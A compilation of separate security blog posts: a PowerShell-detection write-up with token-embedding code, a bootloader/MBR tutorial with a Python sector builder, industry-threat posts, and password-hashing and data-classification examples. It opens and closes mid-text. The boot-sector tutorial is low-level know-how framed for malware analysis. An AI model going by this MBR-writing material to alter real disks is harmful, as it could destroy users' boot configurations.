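    vectors = defaultdict(Counter)
    for script in scripts:
        toks = tokenize(script)
        for i, tok in enumerate(toks):
            for j in range(max(0, i - window), min(len(toks), i + window + 1)):
                if j != i:
                    vectors[tok][toks[j]] += 1
    return vectors


def cosine(u, v):
    dot = sum(u[k] * v[k] for k in u.keys() & v.keys())
    norm_u = math.sqrt(sum(x * x for x in u.values()))
    norm_v = math.sqrt(sum(x * x for x in v.values()))
    return dot / (norm_u * norm_v) if norm_u and norm_v else 0.0


def nearest(vectors, query, exclude=()):
    """Vocabulary token whose vector is closest to `query`; ties broken alphabetically."""
    ranked = sorted((-cosine(query, v), tok) for tok, v in vectors.items() if tok not in exclude)
    return ranked[0][1]


def alias_of(vectors, token):
    """Token similarity: the nearest other token to a cmdlet should be its alias."""
    return nearest(vectors, vectors[token], exclude={token})


def analogy(vectors, a, minus_b, plus_c):
    """Linear relationship: a - b + c, then the closest token outside the inputs."""
    combo = Counter(vectors[a])
    combo.subtract(vectors[minus_b])
    combo.update(vectors[plus_c])
    return nearest(vectors, combo, exclude={a, minus_b, plus_c})


VECTORS = build_embedding(SAMPLE_SCRIPTS)
VOCAB = set(VECTORS)

if __name__ == "__main__":
    for cmdlet in ("invoke-expression", "invoke-webrequest", "get-childitem", "-eq"):
        print(f"{cmdlet:20} nearest: {alias_of(VECTORS, cmdlet)}")
    print("get-process - $processes + $services ~",
          analogy(VECTORS, "get-process", "$processes", "$services"))
    print("one-hot distance iex <-> invoke-expression:",
          one_hot_distance("iex", "invoke-expression", VOCAB))
```

Running the module prints IEX as the nearest neighbour of Invoke-Expression, GCI for Get-ChildItem, a comparison operator for -eq, and Get-Service for the Get-Process analogy. With real Word2vec the vectors are dense and learned rather than sparse counts, but the nearest-neighbour and analogy steps are the same cosine arithmetic, and on a corpus this small a trained model would not be stable enough to demonstrate them.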

Detection of malicious PowerShell scripts with deep learning

We used the Word2vec embedding of the PowerShell language presented in the previous section to train deep learning models capable of detecting malicious PowerShell scripts. The classification model is trained and validated using a large dataset of PowerShell scripts that are labeled “clean” or “malicious,” while the embeddings are trained on unlabeled data. The flow is presented in Figure 3.

Figure 3 High-level overview of our model generation process

Using GPU computing in Microsoft Azure, we experimented with a variety of deep learning and traditional ML models. The best performing deep learning model increases the coverage (for a fixed low FP rate of 0.1%) by 22 percentage points compared to traditional ML models. This model, presented in Figure 4, combines several deep learning building blocks such as Convolutional Neural Networks (CNNs) and Long Short-Term Memory Recurrent Neural Networks (LSTM-RNN). Neural networks are ML algorithms inspired by biological neural systems like the human brain. In addition to the pretrained embedding described here, the model is provided with character-level embedding of the script.

Figure 4 Network architecture of the best performing model

Real-world application of deep learning to detecting malicious PowerShell

The best performing deep learning model is applied at scale using Microsoft ML.Net technology and ONNX format for deep neural networks to the PowerShell scripts observed by Microsoft Defender ATP through the AMSI interface. This model augments the suite of ML models and heuristics used by Microsoft Defender ATP to protect against malicious usage of scripting languages.

Since its first deployment, this deep learning model detected with high precision many cases of malicious and red team PowerShell activities, some undiscovered by other methods. The signal obtained through PowerShell is combined with a wide range of ML models and signals of Microsoft Defender ATP to detect cyberattacks.

The following are examples of malicious PowerShell scripts that deep learning can confidently detect but can be challenging for other detection methods:

Figure 5. Heavily obfuscated malicious script

Figure 6. Obfuscated script that downloads and runs payload

Figure 7. Script that decrypts and executes malicious code

Enhancing Microsoft Defender ATP with deep learning

Deep learning methods significantly improve detection of threats. In this blog, we discussed a concrete application of deep learning to a particularly evasive class of threats: malicious PowerShell scripts. We have and will continue to develop deep learning-based protections across multiple capabilities in Microsoft Defender ATP.

Development and productization of deep learning systems for cyber defense require large volumes of data, computations, resources, and engineering effort. Microsoft Defender ATP combines data collected from millions of endpoints with Microsoft computational resources and algorithms to provide industry-leading protection against attacks.

Stronger detection of malicious PowerShell scripts and other threats on endpoints using deep learning mean richer and better-informed security through Microsoft Threat Protection, which provides comprehensive security for identities, endpoints, email and data, apps, and infrastructure.


Shay Kels and Amir Rubin
Microsoft Defender ATP team


The post Deep learning rises: New methods for detecting malicious PowerShell appeared first on Microsoft Security.

Writing Your First Bootloader for Better Analyses

From time to time we come across malware that stores itself in the Master Boot Record (MBR) and runs during the boot process. Attackers use this technique to infect a machine, mess up its disk layout and eventually demand a ransom before restoring the original disk configuration (Petya is one of the most infamous boot-level ransomware families). That is only the already-known scenario: an attacker who is able to write whatever he likes to your disk has far wider possibilities. For this reason I believe it is worth understanding how the MBR works and how to write a boot loader program; this skill will help you the next time you analyze boot loader malware.

How does the PC boot process work?

The boot process is actually quite simple. When you press the power button, every chip that needs power receives it. Once the BIOS is powered it runs its own stored code, and when its initialization routines finish it looks for a bootable device. A bootable device is a connected device whose first sector is 512 bytes long and ends with the boot signature 0x55 0xAA (the little-endian word 0xAA55) in its last two bytes. If the BIOS finds a first sector carrying that signature, it copies the whole 512-byte sector into RAM at address 0x7C00 and jumps to it, treating the 510 bytes before the signature as executable code. This code is the so-called bootloader. Side note: a bootloader must be written as 16-bit code, because an x86-compatible CPU starts in real mode, a 16-bit mode with segmented addressing kept for backward compatibility, and stays there until the bootloader itself switches the processor to another mode.

Used tools

I am used to writing and reading assembly in Intel syntax (the one I learned during my studies), but today I will use the GNU Assembler, which uses AT&T syntax. It is quite different from Intel syntax, but it works fine for the simple code we are going to write. The first tool is as, the GNU assembler, which takes an assembly file as input and produces an object file containing its binary representation: as -o boot.o boot.asm is what we need. After the assembler we need a linker (the GNU linker is called ld). We tell the linker that we want a flat binary with no ELF headers, linked libraries or symbols, which is what --oformat binary does, and which symbol is the entry point (-e main). We also pass -Ttext 0x7c00 so that the linker resolves every absolute address in our code (for example the addresses of the strings we print) relative to 0x7C00, the address where the BIOS loads the boot sector; without it those references would point to the wrong place at run time. Assuming our file is named boot.asm and our entry point is labelled main, the command is: ld -o boot.bin --oformat binary -e main -Ttext 0x7c00 boot.o. To run the resulting image I simply use qemu: qemu-system-x86_64 boot.bin

The Code

The following code runs at boot, displays three strings and a real-time clock that keeps updating. It was developed as a demo with no concern for performance or optimization; I am sure the code could be optimized and beautified, but that is not the point of this post.

Since the BIOS is still resident in memory, we can use its interrupt services, as described in the reference linked below. The demo bootloader uses the following ones:
1. INT 10h, AH=00h with AL=02h (set video mode 2, 80x25 text), which fixes the screen size
2. INT 10h, AH=07h (scroll window down) to clear the BIOS output from the screen
3. INT 10h, AH=02h (set cursor position) to position the cursor
4. INT 1Ah, AH=02h (read real-time clock) to read the clock
5. INT 10h, AH=0Eh (teletype output) to write a character to the screen

The source code of the boot sector is explained below.

Even if the code is self-describing, let us dig a little into its structure. The first two lines:
1] .code16
2] .global main
state that the code is assembled as 16-bit code and that the exported symbol is the one labelled ‘main’ (the linker needs it to place the entry point at the proper address).
The last two lines:
112] .fill 510-(.-init), 1, 0
113] .word 0xaa55
make the sector bootable. Line 113 emits the boot signature as a little-endian word (the bytes 0x55, 0xAA), while line 112 is an assembler directive that pads the code with zero bytes up to offset 510, so that the signature always lands in the last two bytes of the 512-byte sector regardless of how long the code is.

The code uses the %cx register to track the current state: %cx is 0x0000 while msg is printed, 0x0001 while msg2 is printed, 0x0002 while msg3 is printed, and 0x0003 once we enter the clock-printing loop. The lodsb instruction (see the reference for details) is used to iterate over the characters of a string: it loads the byte at %ds:(%si) into %al and advances %si, so each character can be written to the screen until the terminating null byte (\0) is reached.
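The padding and signature that the last two lines produce can be checked from outside the assembler. The following Python is an added example for this page, not the author’s code: it builds a 512-byte boot sector from raw code bytes the same way (zero padding to offset 510, then 0x55 0xAA) and parses a sector back into the pieces an analyst looks at first: signature, boot code and partition table. The eight-byte demo payload is hand-assembled 16-bit code that prints one character via INT 10h AH=0Eh and then spins; it is a constructed stand-in for the post’s boot code, and the offsets follow the classic MBR layout.

```python
"""Build and inspect a 512-byte MBR image (added example, not the post's code).
Offsets follow the classic MBR layout: boot code, four 16-byte partition
entries at 446..509, and the boot signature in the last two bytes."""
import struct

SECTOR_SIZE = 512
PART_TABLE_OFFSET = 446
SIG_OFFSET = 510
BOOT_SIGNATURE = b"\x55\xaa"   # bytes of the little-endian word 0xAA55 (`.word 0xaa55`)

# Constructed 16-bit real-mode demo payload, hand-assembled (not from the post):
#   B4 0E     mov ah, 0x0e   ; INT 10h teletype output
#   B0 58     mov al, 'X'
#   CD 10     int 0x10       ; print the character
#   EB FE     jmp $          ; spin forever
DEMO_CODE = bytes([0xB4, 0x0E, 0xB0, 0x58, 0xCD, 0x10, 0xEB, 0xFE])


def build_mbr(code, partition_table=None):
    """Zero-pad `code` to offset 510 and append the signature, which is what the
    post's `.fill 510-(.-init), 1, 0` and `.word 0xaa55` do.  When a 64-byte
    partition table is supplied, the code must stop before offset 446."""
    limit = PART_TABLE_OFFSET if partition_table is not None else SIG_OFFSET
    if len(code) > limit:
        raise ValueError(f"boot code is {len(code)} bytes, limit is {limit}")
    body = code + b"\x00" * (SIG_OFFSET - len(code))
    if partition_table is not None:
        if len(partition_table) != 64:
            raise ValueError("partition table must be exactly 64 bytes")
        body = body[:PART_TABLE_OFFSET] + partition_table
    return body + BOOT_SIGNATURE


def make_partition_entry(bootable, type_id, lba_start, sectors):
    """One 16-byte entry: status, CHS start (zeroed), type, CHS end (zeroed),
    LBA start, sector count.  Modern loaders use the LBA fields only."""
    return struct.pack("<B3xB3xII", 0x80 if bootable else 0x00, type_id, lba_start, sectors)


def parse_partition_entry(entry):
    status, type_id, lba_start, sectors = struct.unpack("<B3xB3xII", entry)
    return {"bootable": status == 0x80, "type": type_id,
            "lba_start": lba_start, "sectors": sectors}


def parse_mbr(image):
    """What an analyst wants from a suspect first sector: is the boot signature
    there, what code sits before the partition table, and which partitions are
    defined (entries whose type byte is 0 are unused)."""
    if len(image) != SECTOR_SIZE:
        raise ValueError(f"expected {SECTOR_SIZE} bytes, got {len(image)}")
    entries = [parse_partition_entry(image[o:o + 16])
               for o in range(PART_TABLE_OFFSET, SIG_OFFSET, 16)]
    return {
        "bootable_signature": image[SIG_OFFSET:] == BOOT_SIGNATURE,
        # trailing zero padding removed; real code rarely ends in 0x00 bytes
        "boot_code": image[:PART_TABLE_OFFSET].rstrip(b"\x00"),
        "partitions": [e for e in entries if e["type"] != 0],
    }


if __name__ == "__main__":
    table = make_partition_entry(True, 0x83, 2048, 4096) + b"\x00" * 48
    image = build_mbr(DEMO_CODE, table)
    with open("demo.bin", "wb") as f:       # boot it with: qemu-system-x86_64 demo.bin
        f.write(image)
    print(parse_mbr(image))
```

The image written by the script boots under qemu exactly like the post’s boot.bin. Pointing parse_mbr at the first sector dumped from a real disk (for example with dd if=/dev/sda bs=512 count=1) shows at a glance whether the boot code is the expected few hundred bytes of a standard loader or something that deserves a disassembler.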

Running the boot image

References

  1. David Jurgens: Help PC Reference Library
  2. AshakiranBhatter: Writing BootLoader


The Information Technology industry’s major cybersecurity challenges


The Information Technology (IT) sector has snowballed into an extremely profitable, revenue-generating industry in a relatively short time. IT is largely responsible for initiating and implementing digitalization, converting vast amounts of information from manual to digital formats. The industry’s role in processing data has automatically made it a sought-after target for cyber attackers.

Typically, cybercriminals target industries where the repercussions of a cyberattack will be immense and the stolen data valuable. By targeting the IT sector they hit a large industry with a huge workforce, something that can affect an entire nation’s economy.

The growing threat is confirmed by the numbers itself – according to Seqrite’s Quarterly Threat Report from the second quarter of 2019, IT/ITES companies were the fourth largest target for cyberattacks at 6.15% of the total malware attacks for that quarter.

This risk can be significantly reduced if the IT sector equips itself to tackle the growing threat. The first step is assessment, so the sector must make sure it is in a position to deal with some of the biggest cybersecurity threats it faces.

  1. Skills gap

According to a recent workforce assessment survey, 59% of organizations had vacant cybersecurity positions, and Frost & Sullivan forecasts a global shortfall of 1.5 million professionals by 2020. This statistic sharply illustrates a major problem the IT sector faces when it comes to cybersecurity: the daunting and ever-increasing skills gap.

Skilled cybersecurity personnel are in huge demand, but supply is not keeping up. That is why organizations in the IT sector must keep exploring ways to close the skills gap by investing in regular training and upskilling programs.

  2. MaaS as an Advanced Persistent Threat

Based on the analysis in Seqrite’s annual threat reports, the evolution of RaaS (Ransomware as a Service), itself a form of MaaS (Malware as a Service), points towards a future ‘as a service’ model for Advanced Persistent Threats (APTs).

Hypothetically, malware authors could pivot to searching for generic weaknesses in high-profile sectors like IT/ITES and sell them as a well-organized attack vector to anyone willing to pay. Governments or anti-state actors could make use of APT-as-a-service to gather information or infiltrate different departments of IT companies.

  3. Data breach

Remember the huge Equifax data breach in 2017? Apart from major reputational and operational damage, it was also responsible for major financial setbacks.

Recent reports suggest that the American company will pay about $700 million as part of a global settlement over the breach. Recently, the Indian IT company Wipro also admitted that it had suffered a high-profile data breach.

Companies in the information technology sector must take cognizance of this growing threat, as the amount of valuable data they hold makes them very vulnerable to it.

  4. Insider Threats

The IT sector sees a constant flux of employees, an endless cycle of attrition and hiring. Current and former employees are behind many instances of accidental or deliberate data leaks, a phenomenon commonly known as insider threats.

Insider threats pose a major problem for the IT sector, thanks to the number of people with access to confidential data. Employees may switch between different projects for different clients which means they have access to confidential client information.

If this information is leaked, whether deliberately or inadvertently, it can pose a huge problem for the companies concerned.

Keeping all these threats in mind, it is imperative that the IT sector embraces the challenge and keeps upgrading its cybersecurity solutions. They can consider investing in solutions like Seqrite’s Endpoint Security (EPS), a simple and comprehensive platform to protect enterprise networks from advanced threats, and Unified Threat Management (UTM), a one-stop solution for all enterprise security needs.

The post The Information Technology industry’s major cybersecurity challenges appeared first on Seqrite Blog.

Why Is a Data Classification Policy Absolutely Important?

Today, data is a valuable commodity. Without it, company executives cannot make well-informed decisions, marketers won’t understand their market’s behavior, and people will have a hard time finding each other over social media platforms. But not all data are equal, which is why companies must have a data classification policy in place to safeguard the important and sensitive data.

What Is a Data Classification Policy?

Data classification policy is an organizational framework aimed at guiding employees on how to treat data. During the creation of a data classification policy, categories for data are created to help the company distinguish which data are considered confidential and which are considered public.

A data classification policy applies to all kinds of data acquired by the company. Both digital and written data must be inspected with equal importance and classified appropriately according to the data classification policy.

Data Classification Policy and Cyber Security

When it comes to cybersecurity and risk management against unexpected data breaches, data classification policies play an important role.

Data classification policies help rank-and-file employees, as well as C-level management, identify which set of data must be treated with utmost care. A well-crafted data classification policy would view corporate decisions as strictly confidential, and such highly-sensitive information must be secured with the highest possible form of encryption.

Data policies also shed light on what data are considered public, personal, confidential, and sensitive. Each classification is given a different level of security under the policy, and each data set is given to key personnel for compilation, collection, and storage.

Because of the nature of the policy, data classification plays a supporting role in a company’s cybersecurity program, making it harder for corporate spies to retrieve valuable company data. The data classification policy must also provide details on where the data should be stored and who has authority to retrieve them.
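The policy described above (levels, handling rules, storage locations and who may retrieve data) is easiest to reason about when it is written down as checkable rules. The following is an added example, not code from the original post or from any data classification service: it assumes four levels (public, personal, confidential, sensitive), a constructed table of handling rules and field names, and constructed sample records. It labels each record by the most sensitive field it contains, reports records whose storage or encryption breaks the rules, and enforces a "no read up" check against a reader's clearance.

```python
"""Minimal data classification policy engine (added example, not from the original post).

Levels, handling rules, field-name triggers and sample records are assumptions
constructed for illustration; a real policy defines its own categories.
"""
from dataclasses import dataclass
from enum import IntEnum


class Level(IntEnum):
    """Ordered classification levels: a higher value needs stricter handling."""
    PUBLIC = 0
    PERSONAL = 1
    CONFIDENTIAL = 2
    SENSITIVE = 3


# Handling rules per level (assumed): must data at rest be encrypted, and where may it live?
HANDLING = {
    Level.PUBLIC: {"encrypt": False, "stores": {"website", "shared-drive", "vault"}},
    Level.PERSONAL: {"encrypt": True, "stores": {"shared-drive", "vault"}},
    Level.CONFIDENTIAL: {"encrypt": True, "stores": {"vault"}},
    Level.SENSITIVE: {"encrypt": True, "stores": {"vault"}},
}

# Field names that force a minimum level when present in a record (assumed).
FIELD_LEVELS = {
    "ssn": Level.SENSITIVE,
    "card_number": Level.SENSITIVE,
    "health": Level.SENSITIVE,
    "board_minutes": Level.CONFIDENTIAL,
    "salary": Level.CONFIDENTIAL,
    "email": Level.PERSONAL,
    "phone": Level.PERSONAL,
}


@dataclass
class Record:
    fields: dict
    store: str
    encrypted: bool
    level: Level = Level.PUBLIC  # assigned by classify()


def classify(record: Record) -> Level:
    """Assign the highest level triggered by any field name in the record.

    A record with no regulated fields stays PUBLIC. This classifies by field
    name only; a production system would also inspect the values themselves.
    """
    level = Level.PUBLIC
    for name in record.fields:
        level = max(level, FIELD_LEVELS.get(name.lower(), Level.PUBLIC))
    record.level = level
    return level


def handling_violations(record: Record) -> list:
    """Return the handling rules that the record's current storage breaks."""
    rule = HANDLING[record.level]
    problems = []
    if rule["encrypt"] and not record.encrypted:
        problems.append(f"{record.level.name} data must be encrypted at rest")
    if record.store not in rule["stores"]:
        problems.append(f"{record.level.name} data may not be stored in '{record.store}'")
    return problems


def may_read(clearance: Level, record: Record) -> bool:
    """'No read up': a reader may only retrieve data at or below their clearance."""
    return clearance >= record.level


# Constructed sample records (not real data).
SAMPLE = [
    Record({"title": "Press release"}, store="website", encrypted=False),
    Record({"name": "A. Employee", "email": "a@example.invalid"}, store="shared-drive", encrypted=False),
    Record({"board_minutes": "Q3 acquisition plan"}, store="shared-drive", encrypted=True),
    Record({"name": "B. Customer", "ssn": "000-00-0000"}, store="vault", encrypted=True),
]


def audit(records=SAMPLE) -> dict:
    """Classify each record and report its violations, keyed by record index."""
    report = {}
    for i, rec in enumerate(records):
        classify(rec)
        report[i] = {"level": rec.level.name, "violations": handling_violations(rec)}
    return report


if __name__ == "__main__":
    for idx, entry in audit().items():
        print(idx, entry)
```

Running the audit shows the two failure modes the policy exists to catch: personal data left unencrypted on a shared drive, and confidential material stored somewhere the policy does not allow, even though it is encrypted.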

Data Classification Services

Information security firms know how risky data theft is for companies, especially for Fortune 500 companies that have a large volume of sensitive data. That’s why many information security companies offer data classification services to help companies reduce their overall vulnerability.

Data security experts provide data classification services that include tools, training, and collaboration with clients in the creation of a data classification program. Many data classification services build the data classification policy from the ground up and help with the implementation of the policy. They also conduct security checks to help ensure that the level of security does not fall.

Conclusion

With companies receiving a large volume of data every day, it’s difficult for company employees and managers to stop and think about how a piece of data must be classified and handled. Without a clear and well-structured policy in place, employees are left to decide how data are stored and managed.

If you believe in the importance of data security, then having a well-structured data classification policy and availing data classification services from data security experts will give your company the data protection it needs to prevent heavy damages in case of a data breach.


The post Why Is a Data Classification Policy Absolutely Important? appeared first on .

Google Discovers Massive iPhone Hack

Researchers at Google announced the discovery of a hacking campaign that used hacked websites to deliver malware to iPhones.

Project Zero, Google’s security research team, discovered fourteen previously unknown vulnerabilities, known as zero-days, that were exploited to compromise iPhones. Further research revealed a small collection of hacked websites capable of delivering malware to iPhone users visiting those sites.

“There was no target discrimination; simply visiting the hacked site was enough for the exploited server to attack your device, and if it was successful, installing a monitoring implant. We estimate that these sites receive thousands of visitors per week,” wrote Project Zero member Ian Beer in a blog post announcing their findings.

The data accessible on the compromised phones included the user’s location, their passwords, chat histories, contact lists, and full access to their Gmail accounts. 

“Given the breadth of information stolen, the attackers may nevertheless be able to maintain persistent access to various accounts and services… even after they lose access to the device,” said Beer.

The hacking campaign was active for at least two years before it was discovered by Project Zero. The research team informed Apple of their findings, and the targeted vulnerabilities were patched in an update in February 2019. 

The post Google Discovers Massive iPhone Hack appeared first on Adam Levin.

7 Questions to Ask Your Child’s School About Cybersecurity Protocols

Just a few weeks into the new school year and, already, reports of malicious cyberattacks in schools have hit the headlines. While you’ve made digital security strides in your home, what concerns if any should you have about your child’s data being compromised at school?

There’s a long and short answer to that question. The short answer is don’t lose sleep (it’s out of your control) but get clarity and peace of mind by asking your school officials the right questions. 

The long answer is that cybercriminals have schools in their digital crosshairs. According to a recent report in The Hill, school districts are becoming top targets of malicious attacks, and government entities are scrambling to fight back. These attacks are costing school districts (taxpayers) serious dollars and costing kids (and parents) their privacy.


Prime Targets

According to one report, a U.S. school district becomes the victim of cyberattack as often as every three days. The reason for this is that cybercriminals want clean data to exploit for dozens of nefarious purposes. The best place to harvest pure data is schools where social security numbers are usually unblemished and go unchecked for years. At the same time, student data can be collected and sold on the dark web. Data at risk include vaccination records, birthdates, addresses, phone numbers, and contacts used for identity theft. 

Top three cyberthreats

The top three threats against schools are data breaches, phishing scams, and ransomware. Data breaches can happen through phishing scams and malware attacks that could include malicious email links or fake accounts posing as acquaintances. In a ransomware attack, a hacker locks down a school’s digital network and holds data for a ransom. 

Over the past month, hackers have hit K-12 schools in New Jersey, New York, Wisconsin, Virginia, Oklahoma, Connecticut, and Louisiana. Universities are also targeted.

In the schools impacted, criminals were able to find loopholes in their security protocols. A loophole can be an unprotected device, a printer, or a malicious email link opened by a new employee. It can even be a calculated scam like the Virginia school duped into paying a fraudulent vendor $600,000 for a football field. The cybercrime scenarios are endless. 

7 key questions to ask

  1. Does the school have a data security and privacy policy in place, as well as a cyberattack response plan?
  2. Does the school have a system to educate staff, parents, and students about potential risks and safety protocols? 
  3. Does the school have a data protection officer on staff responsible for implementing security and privacy policies?
  4. Does the school have reputable third-party vendors to ensure the proper technology is in place to secure staff and student data?
  5. Are data security and student privacy a fundamental part of onboarding new school employees?
  6. Does the school create backups of valuable information and store them separately from the central server to protect against ransomware attacks?
  7. Does the school have any new technology initiatives planned? If so, how will it address student data protection?

The majority of schools are far from negligent. Leaders know the risks, and many have put recognized cybersecurity frameworks in place. Also, schools have the pressing challenge of 1) providing a technology-driven education to students while at the same time, 2) protecting student/staff privacy and 3) finding funds to address the escalating risk.

Families can add a layer of protection to a child’s data while at school by making sure devices are protected in a Bring Your Own Device (BYOD) setting. Cybersecurity is a shared responsibility. While schools work hard to implement safeguards, be sure you are taking responsibility in your digital life and equipping your kids to do the same. 

 

The post 7 Questions to Ask Your Child’s School About Cybersecurity Protocols appeared first on McAfee Blogs.

14 Million Customers Affected By Hostinger Breach: How to Secure Your Data

Whether you’re a small business owner or a blogger, having an accessible website is a must. That’s why many users look to web hosting companies so they can store the files necessary for their websites to function properly. One such company is Hostinger. This popular web, cloud, and virtual private server hosting provider and domain registrar boasts over 29 million users. But according to TechCrunch, the company recently disclosed that it detected unauthorized access to a database containing information on 14 million customers.

Let’s dive into the details of this breach. Hostinger received an alert on Friday that a server had been accessed by an unauthorized third party. The server contained an authorization token allowing the alleged hacker to obtain further access and escalate privileges to the company’s systems, including an API (application programming interface) database. An API database defines the rules for interacting with a particular web server for a specific use. In this case, the API server that was breached was used to query the details about clients and their accounts. The database included non-financial information including customer usernames, email addresses, hashed passwords, first names, and IP addresses.

Since the breach, Hostinger stated that it has identified the origin of the unauthorized access and the vulnerable system has since been secured. As a precaution, the company reset all user passwords and is in contact with respective authorities to further investigate the situation.

Although no financial data was exposed in this breach, it’s possible that cybercriminals can use the data from the exposed server to carry out several other malicious schemes. To protect your data from these cyberattacks, check out the following tips:

  • Be vigilant about checking your accounts. If you suspect that your data has been compromised, frequently check your accounts for unusual activity. This will help you stop fraudulent activity in its tracks.
  • Reset your password. Even if your password wasn’t automatically reset by Hostinger, update your credentials as a precautionary measure.
  • Practice good password hygiene. A cybercriminal can crack hashed passwords, such as the ones exposed in this breach, and use the information to access other accounts using the same password. To avoid this, make sure to create a strong, unique password for each of your online accounts.
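The two technical points in this post, that a leaked table of hashed passwords can still be guessed against, and that a password reused across accounts is exposed everywhere once one hash is known, are easiest to see from the storage side. The following added example is not Hostinger's or McAfee's code. It contrasts an unsalted single SHA-256 digest, where two users (or two sites) with the same password produce identical entries, with a per-user salted PBKDF2 record that is slow to compute and verified in constant time. The iteration count and the record format are assumptions chosen for the example.

```python
"""Password storage that limits the damage of a leaked credentials table.

Added example, not code from the original post. The record format
'pbkdf2_sha256$<iterations>$<salt_hex>$<hash_hex>' and the iteration count
are assumptions for illustration.
"""
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000  # assumed; tune so one verification costs ~100 ms on your server
SALT_BYTES = 16


def naive_hash(password: str) -> str:
    """Unsalted single SHA-256: the weak baseline, shown for contrast only.

    It is fast to compute and gives equal output for equal input, so a leaked
    table reveals which users share a password and is cheap to guess against.
    """
    return hashlib.sha256(password.encode()).hexdigest()


def make_record(password: str, iterations: int = PBKDF2_ITERATIONS) -> str:
    """Create a salted, iterated PBKDF2-HMAC-SHA256 record for storage."""
    salt = os.urandom(SALT_BYTES)  # fresh random salt per user
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify(password: str, record: str) -> bool:
    """Recompute with the stored salt and iterations; compare in constant time."""
    try:
        algo, iters, salt_hex, hash_hex = record.split("$")
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(hash_hex)
        iterations = int(iters)
    except ValueError:
        return False  # malformed record: never treat as a match
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(digest, expected)


def reuse_visible(pw_a: str, pw_b: str, hasher) -> bool:
    """True if two users sharing a password would appear as equal entries in a leaked table."""
    return hasher(pw_a) == hasher(pw_b)


if __name__ == "__main__":
    # Constructed sample password, not a real credential.
    rec = make_record("correct horse battery staple")
    print("verify ok:", verify("correct horse battery staple", rec))
    print("verify wrong:", verify("Tr0ub4dor&3", rec))
    print("reuse visible (sha256):", reuse_visible("hunter2", "hunter2", naive_hash))
    print("reuse visible (pbkdf2):", reuse_visible("hunter2", "hunter2", make_record))
```

The salt removes the cross-user and cross-site linkability, the iteration count raises the cost of every guess, and `hmac.compare_digest` avoids leaking timing information during verification. None of this protects a user who reuses a weak password elsewhere, which is why the tip above still stands.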

And, as always, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 14 Million Customers Affected By Hostinger Breach: How to Secure Your Data appeared first on McAfee Blogs.

The retail industry’s major cybersecurity challenges


The retail sector has always been at the risk of cyberattacks. The industry has already seen high-profile data breaches, some of which have happened in the recent past at large retail brands, lucrative to cyberattackers, such as Target, TJX and Home Depot.

One of the major reasons for these attacks is the sheer number of attack vectors. The industry handles a large volume of card, cash, POS and online transactions on a regular basis, making retail a sought-after target for cyberattackers.

The retail sector is increasingly moving towards digital, and while this brings a plethora of opportunities, the risk of cyberattacks grows with it. Survey numbers bear this out: a 2018 report found that 50% of retailers had been breached in the past year. The monetary consequences for retailers can also be major. According to a KPMG study, 19% of customers said they would completely stop shopping at a retailer over a hack, while 33% said they would not shop at the same retailer for more than three months.

These are increasingly troubling statistics and hence, it is important that retailers fix various cybersecurity issues such as:

  1. POS Security Vulnerabilities

One of the reasons POS systems carry such a high security risk is the soaring stakes involved. These systems collect data for hundreds of transactions every single day, making them a veritable gold mine for hackers. They are also more vulnerable to malware because of the very nature of what they are used for.

Because these systems are in near-constant use, network administrators rarely get the time to ensure that the correct updates and patches are applied, leaving them vulnerable to new and advanced threats.

  2. Malware-as-a-service

Of late, malware, and especially ransomware, is readily available for download from the dark web. Even amateurs armed only with criminal intent can access vulnerable retail channels and launch an attack. This naturally raises the sheer number of possible attackers, and that increases the need for retailers to bolster sensitive points in their network. Network security along with endpoint security is extremely vital for retailers, and products such as Seqrite’s UTM are proven to safeguard retail enterprise networks.

  3. Human factors

An enormous amount of cyber risk arises from human factors. In the retail industry, these human factors may not always be controllable, as it employs a large, low-skilled workforce with high attrition rates, along with a considerable amount of third-party interfacing through the supply chain.

  4. Increasing integration with Internet of Things

The Internet of Things (IoT), which essentially connects devices like refrigerators, TVs, other home appliances and even cars to the web, is seeing a heavy adoption. Its potential in the retail industry is immense with companies trying to integrate in-store cameras, sensors etc. with the shoppers’ smartphones.

With multiple devices connecting to an organization’s network, the risk of having unguarded entry points to the system increases. Some of the cyber experts refer to this phenomenon as the ‘Internet of Vulnerabilities’ and if appropriate measures to shield from attacks are not undertaken, the retail industry is nothing more than a fertile hunting ground for cyberattackers.

  5. Security on mobile devices

Mobile phones are ubiquitous and are becoming one of the top tools for shopping. As per a Deloitte report, the younger generation especially 25-34-year-olds are heavily inclined to use mobile devices for browsing, shopping and purchasing.

As employees increasingly use these devices within the office, a company’s network is suddenly under a deluge of connections, some of which might be hosting dangerous malware.

This in turn puts not only the network under threat, but also all the connected devices.

The retail industry is in a vulnerable state and is a target for attacks by organized cybercriminals as well as opportunistic hackers. It is the retail industry’s onus to protect its own operations as well as the critical information of their customers.

It is essential that retailers make use of well-established security practices, frameworks, and solutions like Seqrite to safeguard their customers’ data and their business operations.

The post The retail industry’s major cybersecurity challenges appeared first on Seqrite Blog.

University, Professional Certification or Direct Experience ?

Today I’d like to share a simple and personal thought about teaching models in cybersecurity. Quite often students ask me how to improve their technical skills, and the most common question is: “would it be better to take a university course, a professional certification, or to get directly into the field working in a cybersecurity company?”. The answer is not trivial at all, since it really depends on the student’s maturity and on what he desires to be a few years from now (i.e. a researcher, a professional penetration tester, a reverse engineer, a CISO, etc.), but that recurring question raised a more general one: what are the differences between cybersecurity educational models?


The education process is based upon the information to be shared, meaning that information is the “starting brick” of education. If there is no information to be shared, there is no education process. Of course information alone is not enough for education; everybody knows the difference between a good teacher and an ordinary one, but every teacher starts from a concept to be explained, and that concept is what I will call (in this post) information. If there is someone who teaches, there is at least one other who learns, and by learning he will increase his knowledge of the topic. So knowledge is the focus, and understanding what knowledge means could definitely help us improve our teaching processes. But we have many teaching processes: for example, the university teaching process, which is mainly based on scientific evidence; the certification teaching process, which is mainly focused on procedures and tool sets; the camp teaching process, which is mainly focused on a relational approach (a.k.a. knowing the right person for the specific problem); the technical laboratory, which is mainly focused on personal experience; and so on and so forth. Every process differs from the others, so which teaching process would be more effective at increasing cybersecurity knowledge?

According to Paul Boghossian (Fear of Knowledge: Against Relativism and Constructivism), Luciano Floridi (The Fourth Information Revolution and its Ethical and Policy Implications) and the Internet Encyclopedia of Philosophy, we might divide knowledge into 4 separate categories.
